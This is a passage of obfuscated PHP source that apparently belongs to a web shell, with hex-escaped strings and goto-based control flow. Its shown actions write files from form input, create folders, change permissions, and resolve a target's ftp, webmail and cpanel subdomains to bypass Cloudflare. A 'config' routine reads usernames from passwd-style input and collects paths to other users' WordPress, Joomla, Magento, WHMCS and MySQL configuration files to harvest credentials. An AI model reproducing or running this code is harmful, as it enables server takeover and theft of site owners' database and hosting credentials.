fwrite($updt, $_POST["\x69\x73\x69"]); if ($hasil) { echo "\74\163\x63\162\x69\160\164\76\x77\x69\x6e\x64\157\167\x2e\154\157\143\x61\164\151\157\x6e\x3d\42\x3f\144\x69\x72\x3d" . $dir . "\42\x3b\40\x61\x6c\145\x72\164\50\x22\102\145\162\150\x61\x73\x69\x6c\40\x55\160\x64\141\164\145\41\x21\x22\51\73\x3c\57\x73\143\x72\151\160\x74\x3e"; } else { echo "\74\x73\x63\x72\151\x70\164\x3e\141\154\145\162\164\50\x22\107\x61\147\x61\154\x20\125\x70\x64\x61\164\145\41\x21\x22\x29\x3b\74\x2f\x73\143\x72\x69\160\164\x3e"; } } } goto yBPPy; Dq2KF: $pers = (int) ($free / $total * 100); goto ONUBQ; OKr2f: if ($_GET["\141\x6b\163\x69"] == "\x62\x79\160\x61\x73\x63\146") { echo "\x3c\x66\157\162\155\x20\155\x65\164\150\x6f\x64\x3d\42\120\x4f\x53\x54\42\x3e\x3c\x62\162\x3e\11\x9\x9\xa\x9\11\x9\x3c\144\151\166\40\143\x6c\141\x73\163\75\x22\146\157\x72\x6d\55\x67\x72\157\165\160\40\151\x6e\x70\165\x74\x2d\x67\162\x6f\165\x70\x22\76\xa\11\x9\11\11\74\x73\x65\154\x65\143\164\40\x63\154\141\163\163\75\42\146\x6f\x72\155\55\143\157\x6e\164\162\157\154\42\40\156\x61\x6d\145\75\42\x69\144\x73\120\151\154\151\x68\42\76\xa\11\11\x9\x9\x9\x3c\x6f\x70\x74\151\x6f\156\x3e\x50\151\x6c\x69\x68\40\x4d\145\164\157\x64\145\x3c\57\157\160\x74\151\x6f\156\76\xa\x9\x9\x9\x9\11\x3c\157\x70\x74\151\157\x6e\76\x66\x74\x70\x3c\57\x6f\x70\164\151\x6f\156\x3e\12\x9\x9\11\11\x9\74\157\160\x74\151\x6f\156\76\x64\x69\x72\145\x63\x74\x2d\143\157\x6e\156\164\x65\143\x74\x3c\57\157\x70\x74\151\157\156\x3e\12\x9\11\11\x9\11\74\x6f\160\x74\x69\157\x6e\76\x57\145\x62\x6d\141\x69\x6c\74\x2f\157\160\164\151\157\156\x3e\xa\x9\11\11\x9\11\x3c\157\160\x74\151\157\156\x3e\103\x70\141\x6e\145\154\x3c\x2f\x6f\x70\164\151\157\x6e\76\12\11\x9\11\x9\x3c\57\x73\x65\154\145\143\164\x3e\12\11\11\11\x3c\57\x64\x69\166\x3e\12\11\x9\x9\x3c\144\x69\x76\40\x63\154\x61\x73\x73\75\42\x66\x6f\x72\155\x2d\x67\x72\x6f\165\160\x20\151\156\x70\165\x74\x2d\147\x72\x6f\x75\x70\42\x3e\xa\11\x9\11\11\x3c\151\156\160\x75\x74\x20\x63\154\141\163\x73\75\42\146\x6f\x72\155\x2d\x63\x6f\156\164\x72\157\154\42\x20\x74\x79\x70\145\75\x22\164\x65\x78\164\42\x20\x6e\x61\155\145\75\42\x74\141\x72\x67\x65\164\42\x20\160\154\141\143\145\x68\x6f\x6c\x64\145\162\75\x22\x4d\141\163\x75\x6b\x61\156\x20\x55\x72\x6c\x22\x3e\12\11\x9\11\x9\74\151\156\x70\165\164\x20\143\x6c\141\x73\163\x3d\42\x62\x74\x6e\40\x62\x74\x6e\x2d\x64\x61\x6e\147\x65\x72\x20\x66\x6f\x72\x6d\55\x63\x6f\156\x74\x72\157\x6c\x22\x20\x74\171\x70\145\75\42\x73\165\x62\x6d\151\164\42\40\166\x61\x6c\x75\145\x3d\x22\102\171\x70\x61\163\163\42\76\xa\11\x9\x9\74\x2f\144\x69\166\76\74\142\162\x3e\12\x9\11\x3c\57\x66\x6f\162\155\76"; $target = $_POST["\x74\141\x72\147\x65\164"]; if ($_POST["\151\x64\x73\x50\x69\154\151\x68"] == "\x66\x74\160") { $ftp = gethostbyname("\x66\164\160\x2e" . "{$target}"); echo "\74\142\162\x3e\x3c\160\x20\x61\x6c\x69\x67\156\x3d\x27\143\145\156\164\145\x72\x27\x20\144\x69\x72\x3d\47\x6c\x74\x72\47\x3e\x3c\x66\157\156\164\40\146\141\143\145\x3d\x27\124\x61\150\x6f\155\141\47\40\x73\x69\x7a\145\x3d\47\x32\47\40\143\x6f\154\157\162\x3d\47\x23\60\x30\146\146\x30\60\x27\76\103\x6f\162\162\x65\x63\x74\40\xa\x9\11\11\151\160\x20\151\163\40\72\40\74\x2f\x66\157\x6e\x74\76\x3c\146\157\156\164\40\x66\141\x63\x65\x3d\x27\x54\x61\150\x6f\155\141\x27\40\x73\151\172\x65\75\x27\62\x27\40\143\157\154\157\x72\75\x27\x23\106\66\x38\102\61\106\47\76{$ftp}\74\57\146\157\x6e\x74\x3e\x3c\57\x70\x3e"; } if ($_POST["\151\144\163\x50\151\x6c\151\150"] == "\x64\151\162\145\x63\x74\55\x63\157\156\x6e\x74\x65\x63\x74") { $direct = gethostbyname("\x64\151\162\x65\x63\x74\55\143\157\156\156\145\x63\164\56" . "{$target}"); echo "\74\142\x72\x3e\74\x70\40\141\x6c\x69\x67\156\75\47\143\145\x6e\x74\x65\162\47\40\144\x69\x72\x3d\47\154\x74\x72\47\x3e\x3c\x66\157\x6e\x74\40\146\x61\143\145\75\x27\124\x61\x68\157\x6d\141\47\x20\163\x69\172\x65\75\47\62\x27\40\x63\x6f\154\157\162\x3d\x27\43\x30\x30\146\x66\x30\60\x27\76\103\157\162\162\145\143\x74\40\xa\x9\x9\11\x69\x70\40\151\163\40\72\40\74\x2f\146\x6f\156\x74\x3e\x3c\146\157\x6e\164\40\x66\141\143\x65\75\x27\124\141\150\157\x6d\x61\x27\40\163\x69\172\145\75\x27\62\x27\x20\x63\x6f\x6c\157\162\75\x27\x23\x46\x36\x38\x42\x31\106\x27\x3e{$direct}\74\57\146\157\156\164\x3e\x3c\57\x70\x3e"; } if ($_POST["\151\144\163\x50\x69\154\x69\150"] == "\167\x65\x62\155\141\151\154") { $web = gethostbyname("\167\x65\x62\155\141\151\154\x2e" . "{$target}"); echo "\74\142\x72\x3e\x3c\x70\x20\x61\154\151\x67\156\75\47\143\145\x6e\164\x65\162\x27\40\x64\151\x72\x3d\x27\x6c\164\x72\x27\x3e\x3c\x66\157\156\164\x20\146\141\143\145\x3d\x27\124\141\x68\157\x6d\141\47\40\163\151\172\145\75\x27\62\47\x20\x63\x6f\x6c\157\x72\75\x27\x23\x30\60\x66\x66\60\x30\47\x3e\103\157\x72\x72\145\143\x74\40\12\11\x9\11\x69\x70\x20\151\x73\40\x3a\40\74\57\146\157\x6e\x74\76\74\x66\157\156\x74\x20\x66\141\x63\145\x3d\x27\x54\x61\150\157\155\141\x27\x20\163\151\x7a\x65\75\x27\x32\47\x20\x63\157\x6c\x6f\162\75\47\43\106\66\x38\x42\61\x46\x27\x3e{$web}\x3c\x2f\146\157\156\164\x3e\x3c\57\x70\x3e"; } if ($_POST["\151\x64\x73\x50\x69\154\x69\150"] == "\143\x70\x61\156\145\154") { $cpanel = gethostbyname("\x63\160\141\x6e\x65\x6c\x2e" . "{$target}"); echo "\x3c\142\162\76\74\160\x20\x61\x6c\x69\x67\x6e\x3d\x27\143\x65\156\164\x65\x72\x27\x20\x64\x69\162\75\47\x6c\x74\x72\x27\x3e\x3c\x66\x6f\x6e\164\x20\x66\x61\x63\x65\75\x27\124\x61\150\x6f\155\x61\x27\x20\163\151\172\145\x3d\47\x32\47\40\x63\157\154\x6f\162\x3d\x27\x23\60\60\x66\x66\x30\60\x27\76\x43\x6f\x72\162\x65\143\164\x20\xa\11\x9\x9\x69\x70\x20\151\x73\40\x3a\40\x3c\x2f\x66\157\x6e\x74\76\x3c\146\x6f\x6e\164\40\146\x61\143\145\x3d\47\124\141\x68\157\155\141\x27\x20\163\151\172\x65\75\47\62\47\40\x63\157\x6c\x6f\x72\75\47\x23\x46\x36\70\102\61\x46\x27\x3e{$cpanel}\74\57\x66\x6f\156\164\76\x3c\x2f\x70\76"; } die; } goto Qlhck; Y8MkE: $ver = phpversion(); goto f2PCb; O8Mx0: if ($_GET["\141\x6b\163\151"] == "\142\x75\141\164\x5f\x66\157\x6c\144\145\x72") { $output = "\12\11\x9\x9\x3c\x68\x34\76\74\x69\155\147\x20\x73\162\143\x3d\x27\x68\x74\164\160\72\x2f\57\x61\165\x78\x2e\x69\143\x6f\156\x73\x70\141\154\x61\143\x65\56\x63\157\155\x2f\x75\160\154\x6f\141\144\x73\57\x66\157\x6c\144\145\x72\x2d\x69\143\x6f\156\x2d\62\x35\x36\x2d\x31\67\x38\67\66\x37\x32\64\x38\62\x2e\160\156\147\x27\x20\x63\x6c\141\x73\x73\75\47\x69\x63\157\x27\x3e\x3c\x2f\x69\x6d\147\x3e\x20\102\x75\141\164\x20\x46\x6f\x6c\x64\x65\162\72\x20\74\57\x68\x34\x3e\xa\x9\11\11\74\146\x6f\162\155\x20\155\145\164\150\x6f\x64\75\x27\120\117\x53\x54\x27\76\12\11\11\11\11\74\x69\x6e\160\x75\x74\x20\164\x79\160\145\x3d\47\x74\x65\x78\x74\x27\40\143\x6c\141\163\163\x3d\47\x66\157\162\x6d\x2d\143\157\x6e\x74\162\157\x6c\x27\x20\156\141\155\x65\75\x27\156\x61\x6d\141\x5f\x66\x6f\x6c\144\x65\162\x27\40\141\x75\164\x6f\143\x6f\x6d\x70\154\x65\164\145\x3d\47\157\146\x66\x27\40\x70\x6c\141\143\x65\150\157\x6c\144\145\x72\x3d\47\116\141\x6d\x61\40\106\x6f\154\x64\x65\162\x2e\x2e\x2e\47\x3e\x3c\142\162\x2f\76\xa\x9\x9\x9\11\x3c\142\x75\x74\x74\157\156\40\x74\x79\160\145\75\47\x73\x75\x6d\x62\x69\164\47\x20\x63\154\141\x73\163\75\47\x62\x74\156\x20\x62\164\156\55\x69\x6e\146\x6f\40\x62\164\x6e\x2d\142\x6c\x6f\x63\153\x27\x20\156\141\155\145\75\x27\x62\165\x61\x74\47\x3e\102\165\x61\x74\41\x21\x3c\x2f\142\x75\164\164\x6f\x6e\x3e\12\11\11\x9\x3c\x2f\146\x6f\162\x6d\76"; echo $output; if (isset($_POST["\142\x75\141\164"])) { $nama_folder = $_POST["\x6e\x61\x6d\x61\x5f\146\x6f\x6c\x64\145\x72"]; $folder = preg_replace("\50\133\136\x5c\x77\134\163\134\x64\x5c\x2d\137\176\54\x3b\72\134\x5b\x5c\135\x5c\50\134\x5d\56\x5d\x7c\133\134\56\135\173\62\x2c\175\x29", '', $_POST["\156\x61\155\x61\x5f\x66\x6f\x6c\144\x65\162"]); $fd = mkdir($folder); if ($fd) { echo "\74\163\143\x72\x69\x70\164\76\167\x69\x6e\144\157\x77\x2e\154\x6f\x63\141\x74\x69\x6f\156\75\x22\x3f\144\151\162\x3d" . $dir . "\x22\x3b\40\x61\154\x65\162\x74\50\42\102\145\x72\150\141\163\x69\x6c\x20\115\145\x6d\x62\165\141\x74\40\106\157\x6c\x64\x65\162\x20" . $folder . "\42\x29\73\74\57\x73\x63\162\x69\x70\x74\x3e"; } else { echo "\145\143\150\157\x20\47\x3c\163\143\x72\151\160\x74\76\x20\141\x6c\145\162\164\x28\x27\106\157\154\x64\x65\162\x20" . $folder . "\x20\107\x61\147\x61\x6c\x20\104\x69\142\x75\x61\164\47\51\x3b\x3c\57\x73\143\162\x69\160\x74\76"; } } } goto fJEHo; JOAz0: if ($_GET["\141\153\163\151"] == "\x63\x68\x6d\x6f\x64\x5f\144\151\x72") { $nama = basename(getcwd()); echo "\74\x66\x6f\x72\155\40\x6d\145\x74\150\x6f\x64\75\47\x50\117\x53\x54\x27\76\12\11\11\x9\11\74\x68\x35\x3e\103\150\155\x6f\144\40\x46\157\154\x64\145\162\x20\72\40{$nama}\40\74\57\x68\x35\76\xa\11\11\x9\11\74\x64\x69\166\x20\143\154\141\163\x73\75\47\x66\x6f\x72\155\55\147\162\157\x75\x70\x20\x69\x6e\160\165\x74\x2d\147\162\157\165\160\47\x3e\xa\11\11\11\x9\x9\x3c\x69\x6e\160\x75\x74\40\164\171\160\145\75\x27\x74\145\x78\164\x27\x20\x6e\141\x6d\x65\x3d\x27\160\145\x72\155\x27\40\143\x6c\x61\x73\163\x3d\47\x66\x6f\x72\155\x2d\x63\157\x6e\164\x72\x6f\x6c\x27\40\166\141\154\x75\145\x3d\47" . substr(sprintf("\x25\157", fileperms($_GET["\144\x69\162"])), -4) . "\x27\76\xa\11\x9\x9\11\11\74\x69\x6e\x70\165\164\40\164\x79\160\x65\75\47\163\165\x62\x6d\151\164\47\40\x63\x6c\141\163\x73\x3d\x27\x62\164\156\40\x62\164\x6e\x2d\144\x61\x6e\147\x65\x72\40\146\157\x72\155\55\143\x6f\x6e\x74\162\157\154\47\40\x76\x61\x6c\165\x65\75\47\x43\150\x6d\x6f\144\47\x20\156\x61\155\145\75\x27\143\150\x6d\157\x27\76\xa\11\x9\11\11\x3c\57\144\151\166\76\xa\x9\x9\x9\x3c\x2f\x66\157\162\x6d\76"; if (isset($_POST["\143\x68\x6d\157"])) { if (chmod($_GET["\x64\151\x72"], $_POST["\160\x65\x72\x6d"])) { echo "\x3c\146\157\156\x74\x20\143\x6f\154\157\162\75\x22\154\151\x6d\145\42\76\103\150\141\x6e\x67\145\40\x50\x65\x72\x6d\151\163\163\151\x6f\x6e\x20\102\145\162\150\141\163\151\x6c\x3c\57\x66\x6f\x6e\x74\76\74\x62\162\x2f\x3e"; } else { echo "\74\146\x6f\x6e\164\x20\143\157\x6c\x6f\162\x3d\42\x77\x68\x69\x74\x65\x22\x3e\103\x68\141\156\x67\x65\x20\120\x65\162\x6d\x69\163\163\151\157\156\x20\x47\141\147\141\x6c\x3c\x2f\146\157\x6e\164\76\74\142\x72\x2f\x3e"; } } } goto L24e8; ONUBQ: function formatSize($bytes) { $types = array("\x42", "\113\102", "\x4d\102", "\x47\x42", "\x54\102"); for ($i = 0; $bytes >= 1024 && $i < count($types) - 1; $bytes /= 1024, $i++) { } return round($bytes, 2) . "\40" . $types[$i]; } goto e8ESb; vk5Bh: @clearstatcache(); goto VY1ts; kcGCA: if ($_GET["\x61\153\x73\151"] == "\x63\157\x6e\x66\151\147") { if ($_POST) { $passwd = $_POST["\x70\x61\163\x73\x77\x64"]; mkdir("\151\x6e\144\157\x73\145\x63\x5f\x63\157\156\146\x69\147", 511); $isi_htc = "\x4f\160\164\x69\x6f\x6e\163\40\x61\x6c\x6c\156\122\145\x71\165\x69\162\145\x20\116\x6f\156\x65\x6e\123\x61\164\151\x73\146\x79\40\x41\156\171"; $htc = fopen("\x69\156\144\157\x73\x65\143\137\143\157\156\146\x69\x67\57\x2e\x68\x74\x61\143\x63\x65\x73\x73", "\167"); fwrite($htc, $isi_htc); preg_match_all("\x2f\x28\x2e\x2a\77\51\72\170\x3a\57", $passwd, $user_config); foreach ($user_config[1] as $user_con) { $user_config_dir = "\57\150\157\155\145\57{$user_con}\x2f\160\165\x62\x6c\x69\x63\x5f\150\164\x6d\x6c\57"; if (is_readable($user_config_dir)) { $grab_config = array("\x2f\x68\157\x6d\x65\57{$user_con}\x2f\x2e\155\171\56\x63\156\x66" => "\x63\160\141\156\x65\154", "\x2f\150\x6f\x6d\145\x2f{$user_con}\57\160\165\142\x6c\x69\x63\x5f\x68\x74\155\x6c\57\x63\157\156\146\x69\x67\x2f\153\157\156\x65\x6b\163\x69\x2e\x70\150\x70" => "\114\157\x6b\157\155\x65\144\x69\141", "\x2f\x68\x6f\x6d\x65\57{$user_con}\57\x70\165\x62\x6c\x69\143\x5f\150\164\155\x6c\57\x66\x6f\x72\x75\155\x2f\x63\157\156\146\x69\x67\56\160\150\x70" => "\160\150\x70\x42\x42", "\57\150\157\155\145\x2f{$user_con}\x2f\x70\165\x62\x6c\x69\143\x5f\150\164\155\x6c\57\x73\x69\164\x65\x73\x2f\144\145\x66\x61\165\154\x74\57\163\x65\x74\164\151\156\x67\163\56\160\x68\160" => "\x44\x72\x75\x70\x61\x6c", "\57\150\x6f\x6d\x65\x2f{$user_con}\x2f\x70\x75\142\154\x69\x63\137\x68\164\x6d\154\57\143\x6f\156\x66\151\x67\57\x73\145\164\164\x69\156\x67\x73\x2e\x69\156\x63\x2e\160\150\x70" => "\x50\x72\x65\163\x74\141\123\x68\157\x70", "\57\x68\157\x6d\145\x2f{$user_con}\57\160\x75\x62\154\151\143\x5f\150\x74\x6d\x6c\57\x61\160\x70\57\x65\164\x63\57\x6c\157\x63\x61\154\x2e\170\155\154" => "\x4d\x61\147\x65\156\164\157", "\x2f\150\157\x6d\145\57{$user_con}\57\160\x75\142\154\151\x63\x5f\x68\164\x6d\154\57\x61\144\x6d\x69\x6e\57\x63\x6f\156\x66\x69\147\56\160\x68\x70" => "\117\160\145\x6e\x43\x61\162\164", "\57\150\x6f\x6d\145\57{$user_con}\x2f\160\165\x62\x6c\151\x63\x5f\x68\x74\155\x6c\57\x61\x70\x70\154\x69\x63\x61\x74\x69\157\156\57\x63\157\x6e\146\x69\x67\x2f\x64\141\164\141\x62\x61\163\x65\x2e\x70\150\x70" => "\105\154\154\x69\163\154\x61\142", "\57\150\x6f\x6d\145\57{$user_con}\57\x70\165\142\154\x69\143\x5f\x68\x74\x6d\x6c\57\166\x62\x2f\151\156\x63\154\x75\144\145\x73\x2f\x63\157\x6e\x66\x69\x67\x2e\160\150\160" => "\x56\142\x75\x6c\154\145\164\x69\156", "\x2f\150\x6f\155\x65\57{$user_con}\57\160\x75\142\x6c\x69\143\x5f\150\164\155\154\57\151\x6e\143\x6c\x75\144\x65\x73\x2f\143\157\156\146\x69\147\56\x70\150\x70" => "\x56\x62\165\154\x6c\145\x74\x69\156", "\x2f\150\x6f\x6d\145\57{$user_con}\x2f\x70\x75\142\x6c\x69\x63\x5f\150\x74\155\154\57\x66\157\162\x75\155\x2f\151\x6e\143\x6c\165\x64\145\x73\57\143\x6f\x6e\x66\x69\147\56\160\150\160" => "\x56\x62\x75\154\154\x65\164\151\156", "\x2f\x68\157\155\x65\57{$user_con}\57\x70\165\x62\x6c\x69\143\x5f\150\164\x6d\154\57\146\x6f\162\165\x6d\x73\57\x69\x6e\x63\154\x75\144\145\163\x2f\143\x6f\156\146\x69\x67\x2e\x70\150\x70" => "\126\x62\x75\154\x6c\x65\x74\151\156", "\x2f\150\157\155\x65\x2f{$user_con}\x2f\x70\x75\142\x6c\x69\x63\x5f\x68\x74\x6d\154\x2f\x63\143\x2f\151\156\143\154\165\x64\145\163\x2f\x63\x6f\x6e\x66\x69\147\56\160\150\160" => "\x56\x62\x75\x6c\154\145\x74\x69\156", "\57\150\x6f\155\x65\57{$user_con}\x2f\160\x75\142\154\x69\143\x5f\150\164\x6d\154\x2f\x69\x6e\143\x2f\x63\157\x6e\x66\151\147\56\x70\x68\160" => "\115\171\x42\102", "\x2f\150\157\x6d\x65\57{$user_con}\x2f\x70\165\x62\x6c\x69\143\x5f\x68\164\x6d\x6c\x2f\x69\156\x63\x6c\165\x64\x65\163\x2f\143\157\x6e\146\x69\147\165\162\x65\56\x70\150\x70" => "\117\x73\103\x6f\155\x6d\x65\x72\143\x65", "\57\x68\x6f\x6d\x65\x2f{$user_con}\57\160\165\142\x6c\x69\x63\x5f\x68\164\x6d\x6c\57\x73\150\x6f\x70\x2f\x69\156\x63\154\x75\x64\145\x73\x2f\x63\x6f\x6e\x66\x69\147\165\162\145\x2e\x70\150\x70" => "\117\163\x43\157\x6d\155\x65\162\x63\145", "\57\150\x6f\x6d\145\x2f{$user_con}\57\160\x75\142\154\x69\x63\137\x68\x74\155\154\57\157\163\57\151\156\143\x6c\165\144\x65\x73\57\143\157\x6e\146\151\x67\x75\162\x65\56\x70\x68\x70" => "\x4f\163\103\157\x6d\155\x65\x72\x63\145", "\57\150\x6f\155\x65\57{$user_con}\57\x70\165\x62\x6c\151\143\137\x68\164\x6d\x6c\57\157\163\x63\x6f\155\x2f\x69\156\x63\154\x75\x64\x65\x73\57\143\x6f\156\146\151\x67\x75\x72\x65\x2e\x70\x68\x70" => "\x4f\x73\x43\157\x6d\155\145\162\143\145", "\57\150\x6f\x6d\x65\57{$user_con}\57\160\165\142\x6c\x69\x63\137\150\164\x6d\x6c\57\160\162\x6f\x64\165\143\x74\x73\x2f\x69\156\143\x6c\x75\x64\x65\x73\x2f\143\x6f\156\146\151\147\165\x72\x65\x2e\x70\x68\x70" => "\x4f\x73\x43\x6f\155\155\145\x72\x63\x65", "\57\x68\157\x6d\145\57{$user_con}\x2f\160\x75\x62\154\x69\143\137\150\x74\x6d\x6c\x2f\143\141\162\164\x2f\x69\x6e\x63\154\165\144\x65\163\x2f\143\157\x6e\146\x69\x67\165\x72\x65\x2e\160\x68\x70" => "\x4f\163\103\157\155\x6d\x65\x72\143\x65", "\57\x68\157\x6d\145\57{$user_con}\x2f\x70\x75\x62\x6c\151\x63\x5f\x68\164\155\154\x2f\x69\x6e\143\x2f\143\157\156\x66\x5f\147\154\157\x62\141\154\56\160\x68\x70" => "\111\x50\102", "\57\x68\157\x6d\145\57{$user_con}\x2f\x70\165\x62\x6c\x69\143\137\150\x74\x6d\x6c\57\x77\160\55\x63\157\x6e\146\x69\147\x2e\x70\150\x70" => "\127\157\162\x64\x70\162\145\x73\x73", "\x2f\150\x6f\x6d\x65\57{$user_con}\x2f\160\165\142\x6c\x69\143\x5f\x68\x74\155\x6c\x2f\x77\x70\57\164\145\163\164\x2f\x77\x70\55\x63\157\156\x66\151\147\x2e\x70\150\x70" => "\127\x6f\162\144\160\x72\x65\163\x73", "\x2f\150\x6f\155\x65\57{$user_con}\57\x70\165\x62\x6c\151\143\x5f\x68\164\155\154\x2f\142\154\x6f\x67\57\x77\x70\55\143\157\156\x66\151\147\56\x70\x68\x70" => "\x57\157\162\144\160\162\x65\x73\x73", "\x2f\150\157\155\x65\x2f{$user_con}\57\160\165\x62\x6c\151\x63\137\x68\164\x6d\154\57\x62\x65\x74\x61\x2f\x77\160\55\143\157\x6e\x66\151\147\56\160\x68\160" => "\x57\x6f\162\x64\160\x72\145\163\x73", "\x2f\150\x6f\155\145\x2f{$user_con}\x2f\160\x75\142\154\151\x63\x5f\x68\x74\x6d\x6c\x2f\x70\157\162\x74\x61\x6c\x2f\167\x70\55\x63\x6f\156\x66\151\x67\x2e\x70\x68\160" => "\127\157\x72\x64\x70\x72\x65\x73\x73", "\x2f\x68\157\155\x65\x2f{$user_con}\57\x70\x75\142\154\x69\x63\x5f\x68\x74\x6d\154\x2f\x73\x69\x74\145\x2f\167\160\55\x63\x6f\156\146\151\147\x2e\x70\150\160" => "\x57\157\162\x64\160\x72\x65\x73\163", "\57\150\x6f\x6d\145\57{$user_con}\57\x70\165\x62\154\151\x63\137\x68\164\x6d\154\57\x77\x70\x2f\167\160\55\x63\x6f\156\146\x69\147\x2e\160\150\160" => "\x57\x6f\162\144\x70\x72\x65\x73\163", "\57\150\157\155\145\x2f{$user_con}\x2f\x70\165\x62\154\151\143\x5f\150\x74\155\154\57\127\x50\57\167\x70\x2d\143\157\x6e\146\x69\x67\x2e\160\150\x70" => "\127\x6f\162\144\160\x72\x65\x73\163", "\57\x68\157\x6d\x65\57{$user_con}\57\160\x75\142\154\151\x63\137\x68\164\x6d\x6c\x2f\x6e\x65\x77\163\x2f\167\160\55\x63\x6f\x6e\x66\x69\147\56\160\x68\160" => "\x57\157\162\x64\x70\162\145\x73\x73", "\57\150\x6f\155\145\57{$user_con}\x2f\160\x75\x62\154\151\143\137\x68\x74\x6d\154\x2f\x77\157\x72\x64\x70\162\145\163\x73\57\167\x70\55\143\x6f\x6e\146\x69\147\x2e\x70\150\x70" => "\127\157\162\144\160\x72\x65\x73\163", "\x2f\150\x6f\x6d\x65\x2f{$user_con}\x2f\160\x75\x62\x6c\151\x63\137\x68\x74\155\x6c\57\x74\x65\163\x74\x2f\167\x70\x2d\x63\x6f\156\146\x69\x67\x2e\160\150\x70" => "\x57\x6f\x72\x64\x70\162\x65\163\x73", "\x2f\x68\157\x6d\x65\57{$user_con}\x2f\x70\165\x62\x6c\x69\143\137\150\164\x6d\154\x2f\x64\x65\x6d\157\x2f\x77\160\55\143\157\156\x66\151\147\x2e\160\150\160" => "\127\157\162\x64\160\x72\145\163\163", "\57\150\x6f\x6d\x65\57{$user_con}\57\x70\x75\x62\154\x69\x63\137\x68\x74\x6d\x6c\x2f\150\x6f\155\145\x2f\167\x70\x2d\143\157\156\146\151\x67\56\x70\x68\x70" => "\x57\x6f\x72\x64\160\x72\145\x73\163", "\57\150\157\x6d\145\57{$user_con}\x2f\160\165\142\x6c\151\143\137\x68\x74\155\x6c\57\166\61\57\167\x70\55\143\157\x6e\146\151\147\x2e\x70\x68\x70" => "\x57\x6f\x72\x64\x70\x72\145\163\163", "\x2f\150\x6f\155\145\x2f{$user_con}\57\x70\165\142\154\x69\143\137\x68\164\x6d\154\57\166\62\57\x77\160\x2d\143\157\x6e\x66\151\147\56\160\150\160" => "\127\x6f\x72\144\x70\162\145\163\163", "\x2f\150\x6f\x6d\145\x2f{$user_con}\57\160\x75\x62\x6c\151\143\x5f\x68\x74\155\154\57\160\162\145\x73\163\x2f\167\x70\x2d\x63\157\x6e\146\151\x67\x2e\x70\x68\x70" => "\127\x6f\x72\x64\x70\x72\145\163\x73", "\x2f\x68\157\x6d\x65\57{$user_con}\57\x70\x75\x62\x6c\151\x63\137\x68\164\155\x6c\x2f\156\145\x77\57\x77\x70\55\x63\157\156\x66\151\147\x2e\160\150\160" => "\x57\x6f\x72\x64\160\x72\145\163\x73", "\x2f\150\157\x6d\145\x2f{$user_con}\x2f\x70\165\142\154\151\143\137\x68\x74\x6d\x6c\x2f\x62\154\157\x67\163\x2f\x77\x70\x2d\x63\157\156\x66\x69\147\x2e\160\x68\160" => "\127\157\162\x64\160\162\x65\x73\163", "\x2f\x68\157\x6d\x65\x2f{$user_con}\x2f\160\165\x62\x6c\x69\143\137\x68\x74\155\x6c\x2f\143\x6f\156\x66\x69\x67\165\162\x61\164\151\157\156\x2e\x70\x68\160" => "\x4a\157\157\x6d\154\x61", "\x2f\x68\x6f\155\145\x2f{$user_con}\x2f\160\165\142\154\151\x63\x5f\150\164\x6d\154\57\142\154\x6f\147\x2f\143\157\156\x66\151\147\x75\162\141\x74\x69\157\x6e\56\160\150\x70" => "\x4a\157\157\x6d\154\141", "\x2f\x68\x6f\155\x65\x2f{$user_con}\x2f\160\165\x62\x6c\x69\143\x5f\x68\164\x6d\x6c\x2f\x73\165\142\155\151\x74\x74\151\x63\153\145\x74\x2e\160\150\x70" => "\136\x57\x48\x4d\x43\x53", "\57\150\x6f\155\145\57{$user_con}\57\160\x75\x62\154\x69\143\137\150\164\155\154\x2f\x63\x6d\x73\x2f\x63\x6f\x6e\x66\151\147\165\x72\141\164\x69\x6f\x6e\56\x70\150\160" => "\x4a\157\x6f\155\x6c\141", "\57\150\x6f\x6d\145\57{$user_con}\x2f\160\165\142\x6c\151\x63\137\150\164\x6d\x6c\57\x62\x65\164\141\57\143\157\x6e\146\x69\147\x75\162\x61\x74\x69\x6f\x6e\x2e\x70\x68\160" => "\112\x6f\x6f\155\154\141", "\x2f\150\157\x6d\x65\x2f{$user_con}\x2f\160\x75\x62\x6c\x69\x63\x5f\x68\x74\155\x6c\x2f\x70\157\x72\x74\141\x6c\57\143\157\156\146\x69\147\x75\162\x61\164\x69\x6f\x6e\56\160\150\x70" => "\x4a\x6f\157\155\154\x61", "\57\x68\157\x6d\145\x2f{$user_con}\57\x70\x75\142\x6c\151\x63\x5f\150\x74\x6d\x6c\57\x73\x69\164\145\x2f\x63\x6f\x6e\146\x69\147\x75\162\141\164\151\x6f\x6e\x2e\x70\150\x70" => "\x4a\157\x6f\155\154\141", "\x2f\x68\x6f\x6d\x65\x2f{$user_con}\57\x70\x75\x62\x6c\151\x63\137\150\x74\x6d\x6c\57\155\x61\151\x6e\57\x63\x6f\x6e\146\151\x67\165\x72\141\164\151\x6f\156\x2e\x70\x68\160" => "\x4a\157\157\155\x6c\x61", "\x2f\x68\157\155\145\57{$user_con}\x2f\160\x75\142\x6c\151\143\x5f\x68\164\x6d\154\x2f\150\157\155\x65\57\143\x6f\156\146\x69\x67\x75\x72\x61\164\x69\x6f\156\56\x70\150\160" => "\x4a\x6f\x6f\x6d\x6c\x61", "\57\x68\157\x6d\x65\x2f{$user_con}\x2f\x70\165\142\154\x69\143\x5f\150\x74\155\x6c\57\144\145\x6d\x6f\57\x63\x6f\x6e\146\x69\147\165\x72\x61\164\x69\x6f\156\x2e\160\x68\x70" => "\112\157\x6f\x6d\154\141", "\x2f\150\157\x6d\145\57{$user_con}\x2f\160\x75\x62\x6c\x69\143\x5f\x68\x74\155\x6c\57\164\x65\163\164\x2f\143\x6f\156\146\x69\147\165\162\141\x74\x69\x6f\x6e\x2e\x70\150\x70" => "\x4a\x6f\x6f\155\x6c\x61", "\x2f\150\157\x6d\x65\x2f{$user_con}\x2f\160\165\x62\x6c\x69\x63\137\150\x74\x6d\154\x2f\x76\61\57\143\157\x6e\x66\x69\x67\x75\x72\141\x74\x69\157\x6e\x2e\160\150\x70" => "\x4a\157\x6f\155\154\141", "\57\x68\x6f\155\x65\57{$user_con}\57\x70\x75\x62\154\151\x63\137\150\164\155\x6c\57\166\62\57\x63\157\156\x66\x69\147\165\162\x61\164\x69\x6f\x6e\56\160\x68\x70" => "\x4a\x6f\157\x6d\x6c\141", "\57\150\x6f\x6d\145\x2f{$user_con}\57\160\165\x62\154\x69\143\x5f\x68\164\x6d\x6c\x2f\x6a\157\x6f\155\154\141\x2f\143\x6f\x6e\x66\151\147\165\x72\141\x74\151\x6f\x6e\x2e\x70\x68\x70" => "\112\157\x6f\155\154\141", 